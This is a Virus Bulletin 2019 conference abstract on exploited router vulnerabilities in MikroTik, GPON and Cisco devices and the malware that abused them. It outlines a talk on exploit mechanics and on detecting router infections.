This paper by Anurag Shandilya (K7 Computing) was presented at VB2019 in London, UK on 2 October 2019.
Routers are ubiquitous and highly vulnerable to attack. Despite being the central nervous system of any network, routers are disregarded when it comes to security, as can be proven by the fact that although vulnerabilities in routers are identified and reported, most devices remain unpatched, giving cybercriminals easy targets. In recent years we have seen threat actors shift their focus from complex operating system and network-based attacks to comparatively simple router-based ones.
Other than merely brute-forcing credentials, cyber gangs have been exploiting known and zero-day router vulnerabilities to host malicious code. CVE-2018-14847 is a vulnerability affecting Mikrotik RouterOS from v6.29 to v6.42, which “allowed arbitrary file read and write” over WinBox port 8291, reported in April 2018. Although a patch was available almost immediately, Coinhive, a cryptomining malware, exploited this vulnerability from July 2018 onwards to inject Monero mining code on the error page served up by the device when a user accessed any HTTP page. CVE-2018-10561 was reported in DZS’ GPON routers, which was then exploited by multiple router malware such as Satori and Hajime to carry out their botnet operations. The Satori malware family exploited this vulnerability to “download and execute shell script on device from /tmp directory”. More recently, CVE-2019-1652 has been reported, affecting Cisco routers and allowing “command injection in the router’s certificate generation module”. This vulnerability, in combination with credential brute-forcing, could hand over complete control of a router to an adversary. (There is no known malware exploiting this vulnerability at the time of writing this abstract.)
Detailed analyses of these vulnerabilities have demonstrated the startling ease with which routers are being maliciously exploited from internal networks as well as the Internet. Compromised devices are being used as passive web proxies to snoop traffic, active web proxies to serve cryptominers, as in the case of Coinhive, or as part of a botnet to inflict DDoS attacks. Since specialized security hardware and software like network intrusion detection and prevention systems (NID/PS) are typically needed to detect router infections, the majority of small and medium-sized businesses and home users are still vulnerable to such malware attacks.
This paper and presentation will provide detailed analyses of the exploit mechanics of the CVE-2018-14847, CVE-2018-10561 and CVE-2019-1652 vulnerabilities along with a live demo of how these are actively being exploited in the wild. We will also discuss the IoCs and behavioural changes on infected devices which would assist in the detection of malware on routers without recourse to NIDS/NIPS. We will also provide solutions for generic detection of attempts to exploit the mentioned vulnerabilities.